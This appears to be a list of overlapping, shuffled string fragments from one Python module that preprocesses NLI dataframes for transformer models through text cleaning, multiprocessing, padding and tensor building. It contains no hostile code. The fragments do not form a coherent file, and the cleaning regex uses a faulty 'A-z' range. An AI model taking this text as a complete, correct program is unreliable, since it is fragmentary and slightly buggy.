"a function applied to a df \"\"\" df_split = np.array_split(df, n_cores) pool =",
"in file: %s\", path) if mode.find(\"train\") > -1: examples = self.df2examples_parallel_train(df, n_cores) else:",
"n_cores): result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return result def df2features(self, df, n_cores, mode):",
"n_cores): \"\"\" return clean version of the dataframe with the original index \"\"\"",
"IndexError: return x def simple_pre_process_text(data, text_column): \"\"\" preprocess all input text from dataframe",
"* padding_length) + token_type_ids else: input_ids = input_ids + ([pad_token] * padding_length) attention_mask",
"re import logging import torch import os import pandas as pd import numpy",
"else: input_ids = input_ids + ([pad_token] * padding_length) attention_mask = attention_mask + \\",
"self.base_path = hyperparams[\"base_path\"] def df2examples(self, df, set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df)",
"f in features], dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids for f in features], dtype=torch.long)",
"base = [] for l in lists: base.extend(l) return base def parallelize_df2df(df, func,",
"with label 'drop_label' \"\"\" return df.loc[df.label != drop_label] def clean_df(df, n_cores): \"\"\" return",
"data: data frame with the colum 'text' :type data: pd.DataFrame :param text_column: colum",
":param text_column: colum text_column :type text_column: str \"\"\" s = data.loc[:, text_column].copy() s",
"df_split)) pool.close() pool.join() return result def remove_first_space(x): \"\"\" remove_first_space from word x :param",
"* padding_length) + input_ids attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length)",
"examples = self._create_examples(df, set_type) return examples def get_train_examples(self, df): return self.df2examples(df, \"train\") def",
"+ \\ ([0 if mask_padding_with_zero else 1] * padding_length) token_type_ids = token_type_ids +",
"logging import torch import os import pandas as pd import numpy as np",
"removing non words, removing space in the first position and removing double spaces",
"noqa remove double spaces return s def pre_process_nli_df(data): \"\"\" Apply preprocess on the",
"1 for real tokens and 0 for padding tokens. Only real # tokens",
"a df \"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) result = merge_lists(pool.map(func,",
"examples = self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path def",
"dataframe :param data: data frame with the colum 'text' :type data: pd.DataFrame \"\"\"",
"assert len(attention_mask) == max_length, \"Error with input length {} vs {}\".format( len(attention_mask), max_length)",
"= pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df def parallelize_df2list(df, func, n_cores): \"\"\" general",
"len(input_ids) if self.pad_on_left: input_ids = ([pad_token] * padding_length) + input_ids attention_mask = ([0",
"pd import numpy as np from multiprocessing import Pool import random from transformers.data.processors.utils",
"df.loc[df.label != drop_label] def clean_df(df, n_cores): \"\"\" return clean version of the dataframe",
"def pre_process_nli_df(data): \"\"\" Apply preprocess on the input text from a NLI dataframe",
"for l in lists: base.extend(l) return base def parallelize_df2df(df, func, n_cores): \"\"\" general",
"= hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"] def df2examples(self,",
"_convert_examples_to_features(self, examples): max_length = self.max_length pad_token = self.pad_token pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero =",
"numpy as np from multiprocessing import Pool import random from transformers.data.processors.utils import InputExample,",
"tokens and 0 for padding tokens. Only real # tokens are attended to.",
"== max_length, \"Error with input length {} vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids)",
"len(input_ids) # Zero-pad up to the sequence length. padding_length = max_length - len(input_ids)",
"from cached file %s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids for",
"= self.mask_padding_with_zero label_map = self.get_label_map() features = [] for (ex_index, example) in enumerate(examples):",
"n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores)",
"examples = self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores)",
"df2examples_parallel_dev(self, df, n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new,",
"all_labels = torch.tensor([f.label for f in features], dtype=torch.long) dataset = TensorDataset( all_input_ids, all_attention_mask,",
"colum text_column :type text_column: str \"\"\" s = data.loc[:, text_column].copy() s = s.apply(lambda",
"hyperparams[\"mask_padding_with_zero\"] self.base_path = hyperparams[\"base_path\"] def df2examples(self, df, set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df =",
"features from cached file %s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids",
"df = pre_process_nli_df(df) examples = self._create_examples(df, set_type) return examples def get_train_examples(self, df): return",
"i, label in enumerate(label_list)} return label_map def _create_examples(self, df, set_type): \"\"\"Creates examples for",
"padding tokens. Only real # tokens are attended to. attention_mask = [ 1",
"return examples def _convert_examples_to_features(self, examples): max_length = self.max_length pad_token = self.pad_token pad_token_segment_id =",
"x def simple_pre_process_text(data, text_column): \"\"\" preprocess all input text from dataframe by lowering,",
"\": return x[1:] else: return x except IndexError: return x def simple_pre_process_text(data, text_column):",
"self._create_examples(df, set_type) return examples def get_train_examples(self, df): return self.df2examples(df, \"train\") def get_dev_examples(self, df):",
"filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with label 'drop_label' \"\"\" return df.loc[df.label != drop_label]",
"df.copy() df_new.loc[:, \"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores)",
"token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids else: input_ids = input_ids + ([pad_token]",
"examples def get_train_examples(self, df): return self.df2examples(df, \"train\") def get_dev_examples(self, df): return self.df2examples(df, \"dev\")",
"attention_mask = attention_mask + \\ ([0 if mask_padding_with_zero else 1] * padding_length) token_type_ids",
"= torch.tensor( [f.token_type_ids for f in features], dtype=torch.long) all_labels = torch.tensor([f.label for f",
"df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return result",
"\\ ([pad_token_segment_id] * padding_length) assert len(input_ids) == max_length, \"Error with input length {}",
"= self.df2examples_parallel_train(df, n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features,",
"= {label: i for i, label in enumerate(label_list)} return label_map def _create_examples(self, df,",
"= Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df def parallelize_df2list(df, func,",
"= torch.load(cached_features_file) all_input_ids = torch.tensor( [f.input_ids for f in features], dtype=torch.long) all_attention_mask =",
"= s.apply(remove_first_space) # noqa remove space in the first position s = s.apply((lambda",
"drop_label] def clean_df(df, n_cores): \"\"\" return clean version of the dataframe with the",
"x: spaces.sub(\" \", x))) # noqa remove double spaces return s def pre_process_nli_df(data):",
"import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +') def merge_lists(lists): base = []",
"re.compile(' +') def merge_lists(lists): base = [] for l in lists: base.extend(l) return",
"\"\"\" s = data.loc[:, text_column].copy() s = s.apply(lambda x: x.lower()) s = s.apply((lambda",
"removing double spaces :param data: data frame with the colum 'text' :type data:",
"\"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with label 'drop_label'",
"= inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has 1 for real tokens and 0",
"max_length) assert len(attention_mask) == max_length, \"Error with input length {} vs {}\".format( len(attention_mask),",
"remove_first_space from word x :param x: word :type x: str :return: word withou",
"label, \"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with label",
"df \"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) result = merge_lists(pool.map(func, df_split))",
"level=logging.INFO) spaces = re.compile(' +') def merge_lists(lists): base = [] for l in",
"except IndexError: return x def simple_pre_process_text(data, text_column): \"\"\" preprocess all input text from",
"{} vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids) == max_length, \"Error with input length",
"# Zero-pad up to the sequence length. padding_length = max_length - len(input_ids) if",
"features = [] for (ex_index, example) in enumerate(examples): len_examples = len(examples) inputs =",
"= self.get_label_map() features = [] for (ex_index, example) in enumerate(examples): len_examples = len(examples)",
"x[0] == \" \": return x[1:] else: return x except IndexError: return x",
"clean_df(df, n_cores): \"\"\" return clean version of the dataframe with the original index",
"input length {} vs {}\".format( len(input_ids), max_length) assert len(attention_mask) == max_length, \"Error with",
"examples.append(input_example) return examples def _convert_examples_to_features(self, examples): max_length = self.max_length pad_token = self.pad_token pad_token_segment_id",
"all_token_type_ids = torch.tensor( [f.token_type_ids for f in features], dtype=torch.long) all_labels = torch.tensor([f.label for",
"pool.join() return result def remove_first_space(x): \"\"\" remove_first_space from word x :param x: word",
"np.array_split(df, n_cores) pool = Pool(n_cores) df = pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df",
"len(token_type_ids), max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self,",
"= [] n = df.shape[0] for i in range(n): example = df.loc[i] name",
"max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self, examples,",
"def parallelize_df2list(df, func, n_cores): \"\"\" general fucntion to parallelize a function applied to",
"= torch.tensor( [f.input_ids for f in features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for",
"InputExample, InputFeatures from transformers.data.processors.utils import DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces",
"= data.label o_index = data.o_index dict_ = {\"premise\": new_p, \"hypothesis\": new_h, \"label\": label,",
"self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features in file: %s\", path) if mode.find(\"train\") >",
"\"\"\" preprocess all input text from dataframe by lowering, removing non words, removing",
"= parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for the any nli",
"label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self, examples, n_cores): result =",
"n_cores) torch.save(features, path) return path def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features from cached",
"= parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result def get_labels(self): return [\"contradiction\", \"entailment\",",
"self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path",
"enumerate(label_list)} return label_map def _create_examples(self, df, set_type): \"\"\"Creates examples for the training and",
"{}\".format( len(token_type_ids), max_length) label = label_map[example.label] features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def",
"= df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return result def df2examples_parallel_dev(self,",
"the input text from a NLI dataframe :param data: data frame with the",
"self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero",
"str \"\"\" s = data.loc[:, text_column].copy() s = s.apply(lambda x: x.lower()) s =",
"- len(input_ids) if self.pad_on_left: input_ids = ([pad_token] * padding_length) + input_ids attention_mask =",
"dev sets.\"\"\" examples = [] n = df.shape[0] for i in range(n): example",
"= simple_pre_process_text(data, text_column=\"hypothesis\") label = data.label o_index = data.o_index dict_ = {\"premise\": new_p,",
"del df_new return result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list",
"examples2features_parallel(self, examples, n_cores): result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return result def df2features(self, df,",
"i for i, label in enumerate(label_list)} return label_map def _create_examples(self, df, set_type): \"\"\"Creates",
"get_dev_examples(self, df): return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores): df_new = df.copy() if",
"f in features], dtype=torch.long) dataset = TensorDataset( all_input_ids, all_attention_mask, all_token_type_ids, all_labels) return dataset",
"add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has 1 for",
"\"dev\") def df2examples_parallel_train(self, df, n_cores): df_new = df.copy() if \"o_index\" not in df_new.columns:",
"* padding_length) attention_mask = attention_mask + \\ ([0 if mask_padding_with_zero else 1] *",
"text_column :type text_column: str \"\"\" s = data.loc[:, text_column].copy() s = s.apply(lambda x:",
"from word x :param x: word :type x: str :return: word withou space",
"df.shape[0] for i in range(n): example = df.loc[i] name = example.o_index guid =",
"NLI dataframe :param data: data frame with the colum 'text' :type data: pd.DataFrame",
"func, n_cores): \"\"\" general fucntion to parallelize a function applied to a df",
"hypothesis | label)\"\"\" def __init__(self, hyperparams): super().__init__() self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"]",
"attention_mask = [ 1 if mask_padding_with_zero else 0] * len(input_ids) # Zero-pad up",
"filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for the",
"+ \\ ([pad_token_segment_id] * padding_length) assert len(input_ids) == max_length, \"Error with input length",
"os.path.exists(cached_features_file) logging.info(\"Loading features from cached file %s\", cached_features_file) features = torch.load(cached_features_file) all_input_ids =",
"== \" \": return x[1:] else: return x except IndexError: return x def",
"input_ids = input_ids + ([pad_token] * padding_length) attention_mask = attention_mask + \\ ([0",
"lowering, removing non words, removing space in the first position and removing double",
"= torch.tensor([f.label for f in features], dtype=torch.long) dataset = TensorDataset( all_input_ids, all_attention_mask, all_token_type_ids,",
"transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils import DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log',",
"get_label_map(self): label_list = self.get_labels() label_map = {label: i for i, label in enumerate(label_list)}",
"1 if mask_padding_with_zero else 0] * len(input_ids) # Zero-pad up to the sequence",
"* padding_length) assert len(input_ids) == max_length, \"Error with input length {} vs {}\".format(",
"= df.shape[0] for i in range(n): example = df.loc[i] name = example.o_index guid",
"text_column: str \"\"\" s = data.loc[:, text_column].copy() s = s.apply(lambda x: x.lower()) s",
"\"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores)",
"result def df2features(self, df, n_cores, mode): path = self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving",
"random from transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils import DataProcessor from torch.utils.data import",
"def df2features(self, df, n_cores, mode): path = self.base_path + \"{}_{}\".format(mode, self.max_length) logging.info(\"Saving features",
"\"{}-{}\".format(set_type, name) input_example = InputExample(guid=guid, text_a=example.premise, text_b=example.hypothesis, label=example.label) examples.append(input_example) return examples def _convert_examples_to_features(self,",
"0] * len(input_ids) # Zero-pad up to the sequence length. padding_length = max_length",
"drop_label='-'): \"\"\" drop observations with label 'drop_label' \"\"\" return df.loc[df.label != drop_label] def",
"n_cores) del df_new return result def df2examples_parallel_dev(self, df, n_cores): df_new = df.copy() df_new.loc[:,",
"+ token_type_ids else: input_ids = input_ids + ([pad_token] * padding_length) attention_mask = attention_mask",
"with input length {} vs {}\".format( len(input_ids), max_length) assert len(attention_mask) == max_length, \"Error",
"colum 'text' :type data: pd.DataFrame :param text_column: colum text_column :type text_column: str \"\"\"",
"the colum 'text' :type data: pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\") new_h =",
"self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path def features2dataset(cached_features_file): assert",
"df, set_type): df = filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples = self._create_examples(df, set_type) return",
"\"entailment\", \"neutral\"] def get_label_map(self): label_list = self.get_labels() label_map = {label: i for i,",
"df.index result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return result def df2examples_parallel_dev(self, df,",
"+ attention_mask token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids else: input_ids = input_ids",
"\"hypothesis\": new_h, \"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop",
"noqa s = s.apply(remove_first_space) # noqa remove space in the first position s",
"token_type_ids + \\ ([pad_token_segment_id] * padding_length) assert len(input_ids) == max_length, \"Error with input",
"padding_length = max_length - len(input_ids) if self.pad_on_left: input_ids = ([pad_token] * padding_length) +",
"data: pd.DataFrame :param text_column: colum text_column :type text_column: str \"\"\" s = data.loc[:,",
"in enumerate(label_list)} return label_map def _create_examples(self, df, set_type): \"\"\"Creates examples for the training",
"!= drop_label] def clean_df(df, n_cores): \"\"\" return clean version of the dataframe with",
"= parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return result def df2examples_parallel_dev(self, df, n_cores): df_new",
"example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has 1",
"df.copy() if \"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new,",
"df_new = df.copy() if \"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"] = df.index result",
"return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores): df_new = df.copy() if \"o_index\" not",
"func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for the any nli dataf frame",
"[f.attention_mask for f in features], dtype=torch.long) all_token_type_ids = torch.tensor( [f.token_type_ids for f in",
"1] * padding_length) + attention_mask token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids else:",
"remove double spaces return s def pre_process_nli_df(data): \"\"\" Apply preprocess on the input",
"noqa remove space in the first position s = s.apply((lambda x: spaces.sub(\" \",",
"the original index \"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index df_new =",
"\\ ([0 if mask_padding_with_zero else 1] * padding_length) token_type_ids = token_type_ids + \\",
"on the input text from a NLI dataframe :param data: data frame with",
"data.label o_index = data.o_index dict_ = {\"premise\": new_p, \"hypothesis\": new_h, \"label\": label, \"o_index\":",
"features.append(InputFeatures(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, label=label)) return features def examples2features_parallel(self, examples, n_cores): result = parallelize_df2list(examples,",
"def _create_examples(self, df, set_type): \"\"\"Creates examples for the training and dev sets.\"\"\" examples",
"df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new,",
"{}\".format( len(input_ids), max_length) assert len(attention_mask) == max_length, \"Error with input length {} vs",
"return self.df2examples(df, \"train\") def get_dev_examples(self, df): return self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores):",
"s.apply(lambda x: x.lower()) s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s",
"spaces.sub(\" \", x))) # noqa remove double spaces return s def pre_process_nli_df(data): \"\"\"",
"x: x.lower()) s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s =",
"frame in csv (columns = premise | hypothesis | label)\"\"\" def __init__(self, hyperparams):",
"max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has 1 for real",
"mask_padding_with_zero else 0] * len(input_ids) # Zero-pad up to the sequence length. padding_length",
"label 'drop_label' \"\"\" return df.loc[df.label != drop_label] def clean_df(df, n_cores): \"\"\" return clean",
"else: return x except IndexError: return x def simple_pre_process_text(data, text_column): \"\"\" preprocess all",
"pre_process_nli_df(df) examples = self._create_examples(df, set_type) return examples def get_train_examples(self, df): return self.df2examples(df, \"train\")",
"f in features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for f in features], dtype=torch.long)",
"df = filter_df_by_label(df.dropna()).reset_index(drop=True) df = pre_process_nli_df(df) examples = self._create_examples(df, set_type) return examples def",
"df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result",
"def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def get_label_map(self): label_list = self.get_labels() label_map =",
"inputs[\"token_type_ids\"] # The mask has 1 for real tokens and 0 for padding",
"NLIProcessor(DataProcessor): \"\"\"Processor for the any nli dataf frame in csv (columns = premise",
"self.tokenizer = hyperparams[\"tokenizer\"] self.max_length = hyperparams[\"max_seq_length\"] self.pad_on_left = hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id",
"sets.\"\"\" examples = [] n = df.shape[0] for i in range(n): example =",
"= self.tokenizer.encode_plus(example.text_a, example.text_b, add_special_tokens=True, max_length=max_length) input_ids, token_type_ids = inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask",
"s.apply((lambda x: spaces.sub(\" \", x))) # noqa remove double spaces return s def",
"parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return result def df2features(self, df, n_cores, mode): path = self.base_path",
":return: word withou space in front :rtype: str \"\"\" try: if x[0] ==",
"to a df \"\"\" df_split = np.array_split(df, n_cores) pool = Pool(n_cores) result =",
"spaces = re.compile(' +') def merge_lists(lists): base = [] for l in lists:",
"colum 'text' :type data: pd.DataFrame \"\"\" new_p = simple_pre_process_text(data, text_column=\"premise\") new_h = simple_pre_process_text(data,",
"= df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del df_new return result def get_labels(self):",
"transformers.data.processors.utils import DataProcessor from torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +')",
"preprocess all input text from dataframe by lowering, removing non words, removing space",
"in the first position s = s.apply((lambda x: spaces.sub(\" \", x))) # noqa",
"= re.compile(' +') def merge_lists(lists): base = [] for l in lists: base.extend(l)",
"import pandas as pd import numpy as np from multiprocessing import Pool import",
"df = pd.concat(pool.map(func, df_split)) pool.close() pool.join() return df def parallelize_df2list(df, func, n_cores): \"\"\"",
"pool.close() pool.join() return df def parallelize_df2list(df, func, n_cores): \"\"\" general fucntion to parallelize",
"inputs[\"input_ids\"], inputs[\"token_type_ids\"] # The mask has 1 for real tokens and 0 for",
"n_cores) else: examples = self.df2examples_parallel_dev(df, n_cores) features = self.examples2features_parallel(examples, n_cores) torch.save(features, path) return",
"torch.utils.data import TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +') def merge_lists(lists): base =",
"_create_examples(self, df, set_type): \"\"\"Creates examples for the training and dev sets.\"\"\" examples =",
"= hyperparams[\"pad_on_left\"] self.pad_token = hyperparams[\"pad_token\"] self.pad_token_segment_id = hyperparams[\"pad_token_segment_id\"] self.mask_padding_with_zero = hyperparams[\"mask_padding_with_zero\"] self.base_path =",
"= filter_df_by_label(df_new.dropna()).reset_index(drop=True) df_new = parallelize_df2df(df=df_new, func=pre_process_nli_df, n_cores=n_cores) return df_new class NLIProcessor(DataProcessor): \"\"\"Processor for",
"= self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero label_map = self.get_label_map() features = [] for (ex_index,",
"sequence length. padding_length = max_length - len(input_ids) if self.pad_on_left: input_ids = ([pad_token] *",
"TensorDataset logging.basicConfig(filename='example.log', level=logging.INFO) spaces = re.compile(' +') def merge_lists(lists): base = [] for",
"= [] for l in lists: base.extend(l) return base def parallelize_df2df(df, func, n_cores):",
"str :return: word withou space in front :rtype: str \"\"\" try: if x[0]",
"# noqa remove space in the first position s = s.apply((lambda x: spaces.sub(\"",
"input_ids = ([pad_token] * padding_length) + input_ids attention_mask = ([0 if mask_padding_with_zero else",
"1] * padding_length) token_type_ids = token_type_ids + \\ ([pad_token_segment_id] * padding_length) assert len(input_ids)",
"= df.copy() if \"o_index\" not in df_new.columns: df_new.loc[:, \"o_index\"] = df.index result =",
"del df_new return result def df2examples_parallel_dev(self, df, n_cores): df_new = df.copy() df_new.loc[:, \"o_index\"]",
"= self.max_length pad_token = self.pad_token pad_token_segment_id = self.pad_token_segment_id mask_padding_with_zero = self.mask_padding_with_zero label_map =",
":type data: pd.DataFrame :param text_column: colum text_column :type text_column: str \"\"\" s =",
"label_map = self.get_label_map() features = [] for (ex_index, example) in enumerate(examples): len_examples =",
"features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features from cached file %s\", cached_features_file) features = torch.load(cached_features_file)",
"padding_length) token_type_ids = token_type_ids + \\ ([pad_token_segment_id] * padding_length) assert len(input_ids) == max_length,",
"base def parallelize_df2df(df, func, n_cores): \"\"\" general fucntion to parallelize a function applied",
"return clean version of the dataframe with the original index \"\"\" df_new =",
"\"Error with input length {} vs {}\".format( len(input_ids), max_length) assert len(attention_mask) == max_length,",
"max_length - len(input_ids) if self.pad_on_left: input_ids = ([pad_token] * padding_length) + input_ids attention_mask",
"self.df2examples(df, \"dev\") def df2examples_parallel_train(self, df, n_cores): df_new = df.copy() if \"o_index\" not in",
"return features def examples2features_parallel(self, examples, n_cores): result = parallelize_df2list(examples, self._convert_examples_to_features, n_cores) return result",
"result = parallelize_df2list(df_new, self.get_train_examples, n_cores) del df_new return result def df2examples_parallel_dev(self, df, n_cores):",
"def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features from cached file %s\", cached_features_file) features =",
"in features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for f in features], dtype=torch.long) all_token_type_ids",
"self.max_length) logging.info(\"Saving features in file: %s\", path) if mode.find(\"train\") > -1: examples =",
"= {\"premise\": new_p, \"hypothesis\": new_h, \"label\": label, \"o_index\": o_index} return pd.DataFrame(dict_) def filter_df_by_label(df,",
"from a NLI dataframe :param data: data frame with the colum 'text' :type",
"{label: i for i, label in enumerate(label_list)} return label_map def _create_examples(self, df, set_type):",
"first position s = s.apply((lambda x: spaces.sub(\" \", x))) # noqa remove double",
"return pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with label 'drop_label' \"\"\" return",
"self.get_dev_examples, n_cores) del df_new return result def get_labels(self): return [\"contradiction\", \"entailment\", \"neutral\"] def",
"lists: base.extend(l) return base def parallelize_df2df(df, func, n_cores): \"\"\" general fucntion to parallelize",
"{} vs {}\".format( len(input_ids), max_length) assert len(attention_mask) == max_length, \"Error with input length",
"+ ([pad_token] * padding_length) attention_mask = attention_mask + \\ ([0 if mask_padding_with_zero else",
"<filename>src/lr/models/transformers/processor.py import re import logging import torch import os import pandas as pd",
"df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index result = parallelize_df2list(df_new, self.get_dev_examples, n_cores) del",
"def get_label_map(self): label_list = self.get_labels() label_map = {label: i for i, label in",
"def merge_lists(lists): base = [] for l in lists: base.extend(l) return base def",
"label_map def _create_examples(self, df, set_type): \"\"\"Creates examples for the training and dev sets.\"\"\"",
"tokens are attended to. attention_mask = [ 1 if mask_padding_with_zero else 0] *",
"x.lower()) s = s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s = s.apply(remove_first_space)",
"== max_length, \"Error with input length {} vs {}\".format( len(token_type_ids), max_length) label =",
"self.examples2features_parallel(examples, n_cores) torch.save(features, path) return path def features2dataset(cached_features_file): assert os.path.exists(cached_features_file) logging.info(\"Loading features from",
"double spaces return s def pre_process_nli_df(data): \"\"\" Apply preprocess on the input text",
"\"\"\" return df.loc[df.label != drop_label] def clean_df(df, n_cores): \"\"\" return clean version of",
"of the dataframe with the original index \"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"]",
"attended to. attention_mask = [ 1 if mask_padding_with_zero else 0] * len(input_ids) #",
"Zero-pad up to the sequence length. padding_length = max_length - len(input_ids) if self.pad_on_left:",
"set_type) return examples def get_train_examples(self, df): return self.df2examples(df, \"train\") def get_dev_examples(self, df): return",
"= s.apply((lambda x: re.sub('[^a-zA-z0-9\\s]', '', x))) # noqa s = s.apply(remove_first_space) # noqa",
"Pool(n_cores) result = merge_lists(pool.map(func, df_split)) pool.close() pool.join() return result def remove_first_space(x): \"\"\" remove_first_space",
"def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with label 'drop_label' \"\"\" return df.loc[df.label !=",
"with input length {} vs {}\".format( len(attention_mask), max_length) assert len(token_type_ids) == max_length, \"Error",
"features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for f in features], dtype=torch.long) all_token_type_ids =",
"torch.tensor( [f.input_ids for f in features], dtype=torch.long) all_attention_mask = torch.tensor( [f.attention_mask for f",
"from transformers.data.processors.utils import InputExample, InputFeatures from transformers.data.processors.utils import DataProcessor from torch.utils.data import TensorDataset",
"original index \"\"\" df_new = df.copy() df_new.loc[:, \"o_index\"] = df.index df_new = filter_df_by_label(df_new.dropna()).reset_index(drop=True)",
"padding_length) + input_ids attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) +",
"pd.DataFrame(dict_) def filter_df_by_label(df, drop_label='-'): \"\"\" drop observations with label 'drop_label' \"\"\" return df.loc[df.label",
"nli dataf frame in csv (columns = premise | hypothesis | label)\"\"\" def",
